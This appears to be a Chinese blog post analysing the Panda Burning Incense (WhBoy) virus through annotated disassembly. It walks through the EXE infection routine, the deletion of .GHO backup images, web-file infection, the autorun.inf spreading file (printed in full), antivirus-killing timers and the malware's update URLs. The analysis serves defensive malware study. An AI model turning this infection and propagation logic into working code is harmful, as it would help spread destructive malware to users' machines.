seg000:004093C5  mov     eax, [ebp+var_178]
seg000:004093CB  lea     ecx, [ebp+var_164]
seg000:004093D1  mov     edx, 3Fh
seg000:004093D6  call    FindFirst       ; 查找文件,结果存放在[tbp-0x164]中
seg000:004093DB  test    eax, eax
seg000:004093DD  jnz     loc_40A118      ; 查找失败,跳转
seg000:004093E3
seg000:004093E3 loc_4093E3:                          
seg000:004093E3  mov     eax, [ebp+var_15C]
seg000:004093E9  and     eax, 10h
seg000:004093EC  cmp     eax, 10h
seg000:004093EF  jnz     loc_409BFC      ; 检查是否为目录即faDirectory
seg000:004093EF                          ; 不是目录则跳转,对相应的文件做处理
seg000:004093F5  mov     eax, [ebp+var_158]
seg000:004093FB  cmp     byte ptr [eax], 2Eh ; 排除以 "."开始的系统特殊目录
seg000:004093FE  jz      loc_409BFC
seg000:00409404  lea     edx, [ebp+var_17C]
seg000:0040940A  mov     eax, offset aWindows_0 ; "WINDOWS"
seg000:0040940F  call    StringToUpper
seg000:00409414  mov     eax, [ebp+var_17C] ; 大写的"WINDOWS"
seg000:0040941A  push    eax             ; 入栈保存
seg000:0040941B  lea     edx, [ebp+var_180]
seg000:00409421  mov     eax, [ebp+var_158]
seg000:00409427  call    StringToUpper
seg000:0040942C  mov     edx, [ebp+var_180] ; 大写的文件夹名称
seg000:00409432  pop     eax             ; 恢复保存的字符串
seg000:00409433  call    StringCmp       ; 比较获取到的文件夹名称是否是WINDOWS
seg000:00409438  jz      loc_40A105      ; 是的话跳转进行其他操作
seg000:0040943E  lea     edx, [ebp+var_184]
seg000:00409444  mov     eax, offset aWinnt_0 ; "WINNT"
seg000:00409449  call    StringToUpper
seg000:0040944E  mov     eax, [ebp+var_184] ; 大写的"WINNT"
seg000:00409454  push    eax
seg000:00409455  lea     edx, [ebp+var_188]
seg000:0040945B  mov     eax, [ebp+var_158]
seg000:00409461  call    StringToUpper
seg000:00409466  mov     edx, [ebp+var_188] ; 大写的文件夹名称
seg000:0040946C  pop     eax
seg000:0040946D  call    StringCmp       ; 比较获取到的文件夹名称是否是WINNT
seg000:00409472  jz      loc_40A105      ; 是的话跳转
;后面的操作和前面一样,都是判断是否是病毒中指定的某些特殊文件夹名称,如果是就跳转做其他操作,不是的话继续执行进行判断,直到所有的内置名称判断完毕
;判断了如下的文件夹:"WINDOWS" "WINNT" "system32" "Document And Setting" "System Volume Information" "Recycled" "Windows NT" "WindowsUpdate" "Windows Media Player" "Outlook Express" "Internet Explorer" "NetMeeting"  "Common Files"  "ComPlus Applications" "Common Files" "Messenger" "InstallShield Installation Information" "MSN"  "Microsoft Frontpage" "Movie Maker"  "MSN Gamin Zone"
  • 如果都不是以上的代码的话,那么就会顺序执行到地址004098C6处的代码,代码分析如下:
seg000:004098C6   push    [ebp+strDriverPath]
seg000:004098C9   push    [ebp+var_158]
seg000:004098CF   push    offset aDesktop__ini_1 ; "\\Desktop_.ini"
seg000:004098D4   lea     eax, [ebp+var_224]
seg000:004098DA   mov     edx, 3
seg000:004098DF   call    StringCatN      ; 进行拼接,将"\\Desktop_.ini"拼接到当前到目录
seg000:004098E4   mov     eax, [ebp+var_224] ; 拼接后的完整路径
seg000:004098EA   call    FileExists      ; 检查路径下是否存在Desktop_.ini文件
seg000:004098EF   test    al, al
seg000:004098F1   jz      loc_409ACE      ; 不存在进行跳转
seg000:004098F7   push    [ebp+strDriverPath] ; 磁盘路径
seg000:004098FA   push    [ebp+var_158]   ; 文件夹名称
seg000:00409900   push    offset aDesktop__ini_1 ; "\\Desktop_.ini"
seg000:00409905   lea     eax, [ebp+var_228] ; 存储拼接后的完整路径
seg000:0040990B   mov     edx, 3          ; 进行拼接的字符串个数
seg000:00409910   call    StringCatN      ; 拼接
seg000:00409915   mov     eax, [ebp+var_228]
seg000:0040991B   lea     edx, [ebp+var_8] ; 存储文件读取到内存后的首地址指针
seg000:0040991E   call    ReadFilToMem    ; 读取Desktop_.ini文件到内存中
seg000:0040991E                           ; 也就是获取到了ini文件中存的时间记录
seg000:00409923   lea     eax, [ebp+SystemTime] ; 保存当前系统时间
seg000:00409929   push    eax             ; lpSystemTime
seg000:0040992A   call    j_GetLocalTime  ; 获取当前系统时间
seg000:0040992F   lea     edx, [ebp+var_22C] ; 保存格式化时间信息字符串首地址
seg000:00409935   movzx   eax, [ebp+SystemTime.wYear] ; 年
seg000:00409935                           ; 使用函数将获取到的年份信息格式化到字符串中
seg000:0040993C   call    StrTimeFormat
seg000:00409941   push    [ebp+var_22C]
seg000:00409947   push    offset dword_40A3D0 ; 字符"-"用于分隔
seg000:0040994C   lea     edx, [ebp+var_230]
seg000:00409952   movzx   eax, [ebp+SystemTime.wMonth] ; 月
seg000:00409959   call    StrTimeFormat
seg000:0040995E   push    [ebp+var_230]
seg000:00409964   push    offset dword_40A3D0 ; 字符"-"用于分隔
seg000:00409969   lea     edx, [ebp+var_234]
seg000:0040996F   movzx   eax, [ebp+SystemTime.wDay] ; 日
seg000:00409976   call    StrTimeFormat
seg000:0040997B   push    [ebp+var_234]
seg000:00409981   lea     eax, [ebp+var_C] ; 存储拼接后的格式化时间字符串
seg000:00409984   mov     edx, 5
seg000:00409989   call    StringCatN      ; 将转化后的字符串进行拼接
seg000:00409989                           ; 拼接后成为如下格式:2019-11-27
seg000:0040998E   mov     eax, [ebp+var_8] ; 文件中的时间
seg000:00409991   mov     edx, [ebp+var_C] ; 当前系统时间
seg000:00409994   call    StringCmp       ; 比较文件中的时间和当前系统时间
seg000:00409999   jnz     short loc_4099BF ; 不等跳转
seg000:0040999B   lea     eax, [ebp+var_238] ; 存储拼接后的完整文件夹路径
seg000:004099A1   mov     ecx, [ebp+var_158] ; 文件夹名称
seg000:004099A7   mov     edx, [ebp+strDriverPath] ; 磁盘路径
seg000:004099AA   call    DriverPathCat   ; 拼接
seg000:004099AF   mov     eax, [ebp+var_238]
seg000:004099B5   call    sub_4087E8      ; 继续查找目录,写入ini以及更新ini文件的感染时间
seg000:004099BA   jmp     loc_40A105
  • 上述一段代码执行了病毒感染前的检查工作,会检查目录中的“Desktop_.ini”文件,并更新感染时间。当一个文件遍历结束后,会从标号loc_40A105处的代码跳转回loc_4093E3处重新开始执行上述步骤。这里并没有执行文件感染操作,具体的感染操作是在地址004093EF处的代码跳转到的标号loc_409BFC处。
seg000:00409BFC loc_409BFC:       ; CODE XREF: FindFileAndInfect+A7j
seg000:00409BFC                   ; FindFileAndInfect+B6j
seg000:00409BFC  mov     eax, [ebp+var_158] ; 文件名
seg000:00409C02  cmp     byte ptr [eax], 2Eh ; 字符"."
seg000:00409C05  jz      loc_40A0FE      ; 跳过特殊的系统文件
seg000:00409C0B  lea     edx, [ebp+var_274] ; 存储获取到的后缀名
seg000:00409C11  mov     eax, [ebp+var_158]
seg000:00409C17  call    GetFileSuffix   ; 获取文件后缀名
seg000:00409C1C  mov     eax, [ebp+var_274]
seg000:00409C22  lea     edx, [ebp+var_270] ; 存储大写的后缀名
seg000:00409C28  call    UpperSuffixStr  ; 转换后缀名为大写
seg000:00409C2D  mov     eax, [ebp+var_270]
seg000:00409C33  mov     edx, offset dword_40A3DC ; "GHO"
seg000:00409C33                          ; 系统镜像文件后缀名
seg000:00409C38  call    StringCmp       ; 比较后缀名
seg000:00409C3D  jnz     short loc_409C64 ; 不是GHO的话跳转
seg000:00409C3F  lea     eax, [ebp+var_278]
seg000:00409C45  mov     ecx, [ebp+var_158]
seg000:00409C4B  mov     edx, [ebp+strDriverPath]
seg000:00409C4E  call    DriverPathCat
seg000:00409C53  mov     eax, [ebp+var_278]
seg000:00409C59  call    CheckPath       ; 检查路径
seg000:00409C5E  push    eax             ; lpFileName
seg000:00409C5F  call    j_DeleteFileA   ; 删除系统镜像文件
  • 上述代码完成了文件后缀名检查功能,如果检查到后缀名为“GHO”也就是文件为系统镜像文件,那么就删除,否则跳转到标记loc_409C64处进行后续操作。
;省略部分代码,省略的代码用于判断文件是否是setup.exe或NTDETECT.COM
; 上述两个文件都不是的话,进行下面的操作
seg000:00409D02  lea     edx, [ebp+var_294] 
seg000:00409D08  mov     eax, [ebp+var_158] ; 文件路径
seg000:00409D0E  call    GetFileSuffix   ; 得到后缀
seg000:00409D13  mov     eax, [ebp+var_294]
seg000:00409D19  lea     edx, [ebp+var_290]
seg000:00409D1F  call    StringToUpper   ; 转化为大写
seg000:00409D24  mov     eax, [ebp+var_290] ; 大写的后缀
seg000:00409D2A  push    eax
seg000:00409D2B  lea     edx, [ebp+var_298]
seg000:00409D31  mov     eax, offset dword_40A414 ; "EXE"
seg000:00409D36  call    StringToUpper
seg000:00409D3B  mov     edx, [ebp+var_298] ; 大写的"EXE"
seg000:00409D41  pop     eax
seg000:00409D42  call    StringCmp
seg000:00409D47  jnz     short loc_409D68 ; 检查文件后缀是否为exe
seg000:00409D47                          ; 是的话执行感染操作,不是的话跳转
seg000:00409D49  lea     eax, [ebp+var_29C]
seg000:00409D4F  mov     ecx, [ebp+var_158]
seg000:00409D55  mov     edx, [ebp+strDriverPath]
seg000:00409D58  call    DriverPathCat   ; 拼接出完整的exe文件路径
seg000:00409D5D  mov     eax, [ebp+var_29C];传入参数为完整文件路径
seg000:00409D63  call    InfectFile      ; 病毒感染函数
  • 上述代码得到后缀是exe的文件,然后调用函数进行病毒感染,重命名函数InfectFile内部分析如下:
seg000:00407F62  mov     eax, [ebp+var_4] ; 文件的完整路径
seg000:00407F65  call    GetFileName     ; 获取到完整的文件路径
seg000:00407F6A  mov     eax, [ebp+var_1E0]
seg000:00407F70  call    OpenFileAndCheckRun ; 打开文件判断是否运行
seg000:00407F75  test    al, al
seg000:00407F77  jz      short loc_407F86 ; 文件未运行跳转
seg000:00407F79  xor     eax, eax
seg000:00407F7B  pop     edx
seg000:00407F7C  pop     ecx
seg000:00407F7D  pop     ecx
seg000:00407F7E  mov     fs:[eax], edx
seg000:00407F81  jmp     INJECT_FILE_END ; 文件正在运行结束感染
seg000:00407F81                          ; 重命名loc_0040811A为INJECT_FILE_END

seg000:00407F86 loc_407F86:     ; CODE XREF: InfectFile+77j
seg000:00407F86  call    @System@Randomize$qqrv ; System::Randomize(void)
seg000:00407F8B  lea     edx, [ebp+var_1E4]
seg000:00407F91  xor     eax, eax
seg000:00407F93  call    GetPathName     ; 得到病毒文件所在的路径
seg000:00407F98  mov     edx, [ebp+var_1E4]
seg000:00407F9E  mov     eax, [ebp+var_4]
seg000:00407FA1  call    StringCmp       ; 判断病毒文件和要感染文件是否在同一路径下
seg000:00407FA1                          ; 在同一路径下放弃感染
seg000:00407FA6  jnz     short loc_407FB5 ;
seg000:00407FA6                          ; 省略部分代码,和上面一样的代码

seg000:00407FB5 loc_407FB5:     ; CODE XREF: InfectFile+A6j
seg000:00407FB5  lea     eax, [ebp+var_8] ; 设置感染标记
seg000:00407FB8  call    SetAFlag
seg000:00407FBD  lea     edx, [ebp+var_8] ; 存储内存首地址指针
seg000:00407FC0  mov     eax, [ebp+var_4]
seg000:00407FC3  call    ReadFilToMem    ; 读取文件到内存中
seg000:00407FC8  cmp     [ebp+var_8], 0  ; 判断是否读取成功
seg000:00407FCC  jnz     short loc_407FDB ; 失败结束感染
seg000:00407FCC                          ; 省略部分的一样的代码

seg000:00407FDB loc_407FDB:               ; CODE XREF: InfectFile+CCj
seg000:00407FDB  mov     edx, [ebp+var_8] ; 内存首地址
seg000:00407FDE  mov     eax, offset aWhboy ; "WhBoy"
seg000:00407FE3  call    FindSingPos     ; 判断字符串"WhBoy"在文件中的位置
seg000:00407FE3                          ; 相当于检查文件是否有"WhBoy"信息
seg000:00407FE3                          ; 如果有就退出感染
seg000:00407FE8  test    eax, eax
seg000:00407FEA  jle     short loc_407FF9 ;
seg000:00407FEA                           ; 省略部分一样的代码

seg000:00407FF9 loc_407FF9:    ; CODE XREF: InfectFile+EAj
seg000:00407FF9  push    80h             ; dwFileAttributes
seg000:00407FFE  mov     eax, [ebp+var_4]
seg000:00408001  call    CheckPath
seg000:00408006  mov     ebx, eax
seg000:00408008  push    ebx             ; lpFileName
seg000:00408009  call    j_SetFileAttributesA ; 修改属性
seg000:0040800E  push    1               ; dwMilliseconds
seg000:00408010  call    j_Sleep         ; 设置睡眠时间
seg000:00408015  push    0               ; apt
seg000:00408017  push    ebx             ; hdc
seg000:00408018  lea     edx, [ebp+var_1E8]
seg000:0040801E  xor     eax, eax
seg000:00408020  call    GetPathName     ; 得到文件路径
seg000:00408025  mov     eax, [ebp+var_1E8]
seg000:0040802B  call    CheckPath       ; 检查路径
seg000:00408030  push    eax             ; lpExistingFileName
seg000:00408031  call    j_CopyFileA     ; 复制当前运行的病毒文件,并覆盖将要被感染的文件
seg000:00408036  test    eax, eax
seg000:00408038  jnz     short loc_408047 ; 判断是否覆盖成功
seg000:00408038                           ; 失败则结束,省略部分代码

seg000:00408047 loc_408047:    ; CODE XREF: InfectFile+138j
seg000:00408047  push    offset dword_40816C ; "WhBoy"
seg000:0040804C  lea     edx, [ebp+var_1EC]
seg000:00408052  mov     eax, [ebp+var_4]
seg000:00408055  call    GetFileName     ; 从文件路径中得到文件名
seg000:0040805A  push    [ebp+var_1EC]
seg000:00408060  push    offset a_exe_0  ; ".exe"
seg000:00408065  push    offset dword_40818C ; 0x2
seg000:0040806A  mov     eax, [ebp+var_8] ; 感染标记
seg000:0040806D  call    GetFileLen      ; 得到感染标记长度
seg000:00408072  lea     edx, [ebp+var_1F0]
seg000:00408078  call    StrTimeFormat   ; 格式化的时间
seg000:0040807D  push    [ebp+var_1F0]
seg000:00408083  push    offset dword_408198 ; 0x1
seg000:00408088  lea     eax, [ebp+var_10]
seg000:0040808B  mov     edx, 6
seg000:00408090  call    StringCatN      ; 将上述全部拼接起来,组合成一个完整的感染标记
seg000:00408090                          ; 类似于前面分析过的
seg000:00408095  lea     eax, [ebp+var_C]
seg000:00408098  mov     edx, [ebp+var_8]
seg000:0040809B  call    @System@@LStrLAsg$qqrpvpxv ; System::__linkproc__ LStrLAsg(void *,void *)
seg000:004080A0  mov     edx, [ebp+var_4]
seg000:004080A3  lea     eax, [ebp+var_1DC]
seg000:004080A9  call    CreateNewFile   ; 创建文件
seg000:004080AE  mov     eax, off_40E2BC
seg000:004080B3  mov     byte ptr [eax], 2
seg000:004080B6  lea     eax, [ebp+var_1DC]
seg000:004080BC  call    Append          ; 以附加的方式打开文件
seg000:004080C1  call    _IOTest
seg000:004080C6  mov     edx, [ebp+var_C]
seg000:004080C9  lea     eax, [ebp+var_1DC]
seg000:004080CF  call    WriteFileInfo   ; 以附加的方式写入要被感染文件的原内容
seg000:004080D4  call    Flush
seg000:004080D9  call    _IOTest
seg000:004080DE  mov     edx, [ebp+var_10]
seg000:004080E1  lea     eax, [ebp+var_1DC]
seg000:004080E7  call    WriteFileInfo   ; 以附加的方式写入标记信息
seg000:004080EC  call    Flush
seg000:004080F1  call    _IOTest
seg000:004080F6  lea     eax, [ebp+var_1DC]
seg000:004080FC  call    CloseFile       ; 关闭文件
										;部分代码略
seg000:0040810E  jmp     short INJECT_FILE_END ; 感染结束
;上述部分代码和之前分析的一样,就不再详细分析
  • 感染函数就如上述:先将目标文件读取到内存,并获取文件名和大小,然后将病毒文件复制到目标文件之前,应追加目标程序的文件,最后再加入标记,这样就完成了病毒的感染过程。
  • 以上只是exe、src、pif、com等文件使用的感染函数,其它还有php、asp、htm等Web类型的文件使用了另一个函数进行感染,操作是将一串html代码字符串""写入符合要求的文件末尾,具体分析如下:
seg000:004079F1  lea     edx, [ebp+var_C] ; 存储内存首地址指针
seg000:004079F4  mov     eax, [ebp+var_4] ; 文件路径
seg000:004079F7  call    ReadFilToMem    ; 读取文件到内存中
seg000:004079FC  lea     ecx, [ebp+var_8]
seg000:004079FF  mov     edx, offset aSearch ; "Search"
seg000:00407A04  mov     eax, offset aNbEndWGIspy_ps ; "=nb{end'w{g>ispy>,.ps~*bb?2'gm.12&mmeb|"...
seg000:00407A09  call    GetHtmlStr      ; 函数用来使用传入的字符串就算出一段html代码
seg000:00407A09                          ; 这里构建出的代码字符串为:
seg000:00407A09                          ; ""
seg000:00407A0E  mov     edx, [ebp+var_C]
seg000:00407A11  mov     eax, [ebp+var_8]
seg000:00407A14  call    FindSingPos     ; 判断是否是已经修改过的文件
seg000:00407A19  test    eax, eax
seg000:00407A1B  jnz     loc_407AC3      ; 修改过进行跳转,结束感染
seg000:00407A21  xor     eax, eax
seg000:00407A23  push    ebp
seg000:00407A24  push    offset loc_407AB9
seg000:00407A29  push    dword ptr fs:[eax]
seg000:00407A2C  mov     fs:[eax], esp
seg000:00407A2F  mov     eax, [ebp+var_4]
seg000:00407A32  call    FileExists      ; 关闭文件
seg000:00407A37  test    al, al
seg000:00407A39  jz      short loc_407A5A ; 关闭失败跳转退出感染
seg000:00407A3B  mov     edx, 1
seg000:00407A40  mov     eax, [ebp+var_4]
seg000:00407A43  call    FileOpen        ; 打开文件
seg000:00407A48  mov     ebx, eax
seg000:00407A4A  mov     ecx, 2          ; dwMoveMethod
seg000:00407A4F  xor     edx, edx        ; lDistanceToMove
seg000:00407A51  mov     eax, ebx
seg000:00407A53  call    sub_4056FC      ; 设置文件内指针指向末尾
seg000:00407A58  jmp     short loc_407A64

seg000:00407A64 loc_407A64:    ; CODE XREF: sub_4079CC+8Cj
seg000:00407A64  cmp     ebx, 0FFFFFFFFh ; 判断指针是否设置成功
seg000:00407A67  jnz     short loc_407A73
seg000:00407A69  xor     eax, eax
seg000:00407A6B  pop     edx
seg000:00407A6C  pop     ecx
seg000:00407A6D  pop     ecx
seg000:00407A6E  mov     fs:[eax], edx   ; 将标记代码字符串写入文件尾部
seg000:00407A71  jmp     short loc_407AC3 ; 跳转到结束
2.定时器回调分析
  • 分析完毕上述线程回调中的病毒感染过程后,开始对另一个感染过程也就是使用了定时器的过程进行分析。定时器中会执行和上述操作类似的过程,遍历所有磁盘找到根目录,然后保存病毒副本setup.exe文件在根目录下,并在目录下创建一个autorun.inf文件,具体分析如下:

    定时器设置的时间间隔为6秒

seg000:0040C374 SetTimerAuto    proc near               ; CODE XREF: InfectOtherFile+5p
seg000:0040C374                 push    offset TimerFunc ; lpTimerFunc 定时器回调函数
seg000:0040C379                 push    1770h           ; uElapse	时间设置为6秒
seg000:0040C37E                 push    0               ; nIDEvent
seg000:0040C380                 push    0               ; hWnd
seg000:0040C382                 call    j_SetTimer
  • 部分关键代码如下:
    长文预警-超详细的熊猫烧香病毒分析_01_第5张图片
  • 分析后发现autorun.inf中写入的内容为下面这段
    长文预警-超详细的熊猫烧香病毒分析_01_第6张图片
  • 整理后为这样一段格式的内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
3.网络感染分析
  • 函数NetWorkInfect主要逻辑就是循环产生线程,然后在线程回调函数内部进行操作:
seg000:0040BAFB                 push    0
seg000:0040BAFD                 push    0
seg000:0040BAFF                 lea     eax, [ebp+var_4]
seg000:0040BB02                 push    eax
seg000:0040BB03                 mov     ecx, offset sub_40BA8C;传入的线程回调函数
seg000:0040BB08                 xor     edx, edx
seg000:0040BB0A                 xor     eax, eax
seg000:0040BB0C                 call    BeginThread     ; 函数内部创建一个新线程并开启
seg000:0040BB11                 dec     bx              ; 用于计数,循环次数为10次
seg000:0040BB14                 jnz     short loc_40BAFB
  • 创建的线程回调中有一个主要的函数seg000:0040BAAC call sub_40B864 ; 关键函数,内部进行端口扫描并连接服务,然后在内部进行了操作:
    长文预警-超详细的熊猫烧香病毒分析_01_第7张图片
    长文预警-超详细的熊猫烧香病毒分析_01_第8张图片
    在这里插入图片描述

3.第三个call-保护自身

  • 在这个函数内部设置了6个计时器,每个计时器使用不同的回调函数进行不同的操作,其实从各个定时器的时间设置上也可以大致猜测其回调函数干了什么事,这里分析如下:
seg000:0040D096 loc_40D096:         ; CODE XREF: ProtectSelf+7j
seg000:0040D096   push    offset sub_40CEE4 ; lpTimerFunc
seg000:0040D096                           ; 内部关闭了杀毒软件,设置了启动项和文件隐藏
seg000:0040D09B   push    3E8h            ; uElapse  1秒
seg000:0040D0A0   push    0               ; nIDEvent
seg000:0040D0A2   push    0               ; hWnd
seg000:0040D0A4   call    j_SetTimer
seg000:0040D0A9   mov     dword_40E2B0, eax
seg000:0040D0AE   push    offset sub_40D040 ; lpTimerFunc
seg000:0040D0AE                           ; 通过网址http://www.ac86.cn/66/up.txt来更新
seg000:0040D0AE                           ; 现在网址已没用,不在分析
seg000:0040D0B3   push    124F80h         ; uElapse 20分钟
seg000:0040D0B8   push    0               ; nIDEvent
seg000:0040D0BA   push    0               ; hWnd
seg000:0040D0BC   call    j_SetTimer
seg000:0040D0C1   mov     dword_40E2B4, eax
seg000:0040D0C6   push    offset sub_40D048 ; lpTimerFunc
seg000:0040D0C6                           ; 内部有多个线程
seg000:0040D0C6                           ; 遍历了磁盘,关闭了共享功能
seg000:0040D0C6                           ; 然后杀死了当前的时钟
seg000:0040D0CB   push    2710h           ; uElapse 10秒
seg000:0040D0D0   push    0               ; nIDEvent
seg000:0040D0D2   push    0               ; hWnd
seg000:0040D0D4   call    j_SetTimer
seg000:0040D0D9   mov     uIDEvent, eax
seg000:0040D0DE   push    offset sub_407430 ; lpTimerFunc
seg000:0040D0DE                           ; 设置杀毒软件注册表启动项为失效
seg000:0040D0DE                           ; 关闭了一些服务
seg000:0040D0E3   push    1770h           ; uElapse 6秒
seg000:0040D0E8   push    0               ; nIDEvent
seg000:0040D0EA   push    0               ; hWnd
seg000:0040D0EC   call    j_SetTimer
seg000:0040D0F1   push    offset sub_40CC4C ; lpTimerFunc
seg000:0040D0F1                           ; 更新病毒,从网址http://update.whboy.net/worm.txt
seg000:0040D0F6   push    2710h           ; uElapse 10秒
seg000:0040D0FB   push    0               ; nIDEvent
seg000:0040D0FD   push    0               ; hWnd
seg000:0040D0FF   call    j_SetTimer
seg000:0040D104   push    offset sub_40C728 ; lpTimerFunc
seg000:0040D104                           ; 获取一些网址的源码
seg000:0040D109   push    1B7740h         ; uElapse 30分钟
seg000:0040D10E   push    0               ; nIDEvent
seg000:0040D110   push    0               ; hWnd
seg000:0040D112   call    j_SetTimer
seg000:0040D117   retn

第一个计时器功能概览:

长文预警-超详细的熊猫烧香病毒分析_01_第9张图片
sub_406E2C内部线程回调函数主要功能-下图只是遍历窗口,后面还有对进程的遍历,这里就不再赘述了,有兴趣的可以自己查看,大致结束了如下的一些进程:
长文预警-超详细的熊猫烧香病毒分析_01_第10张图片
长文预警-超详细的熊猫烧香病毒分析_01_第11张图片

第二个计时器功能概览:

  • 更新程序,网址http://www.ac86.cn/66/up.txt已作废,不进行分析

第三个计时器功能概览:

长文预警-超详细的熊猫烧香病毒分析_01_第12张图片

第四个计时器功能概览:

  • 设置了如下的一些杀毒软件的启动项:
    长文预警-超详细的熊猫烧香病毒分析_01_第13张图片
  • 有两个函数用于停止服务,停止的服务大致有以下一些:(还挺多的0.0)
    长文预警-超详细的熊猫烧香病毒分析_01_第14张图片

第五个计时器概览:

  • 获取了一些网页的源码,这里网页地址如果使用OD单步调试会跑飞,可以跳过获取源码的函数,通过设置EIP来得到如下要获取的网址的字符串
    长文预警-超详细的熊猫烧香病毒分析_01_第15张图片

第六个计时器概览:

  • 通过 “http://update.whboy.net/worm.txt”这个网址进行更新,网址已不在,也不再分析

致谢

  • 感谢15PB教学视频和老师对我的指导。

你可能感兴趣的:(病毒分析)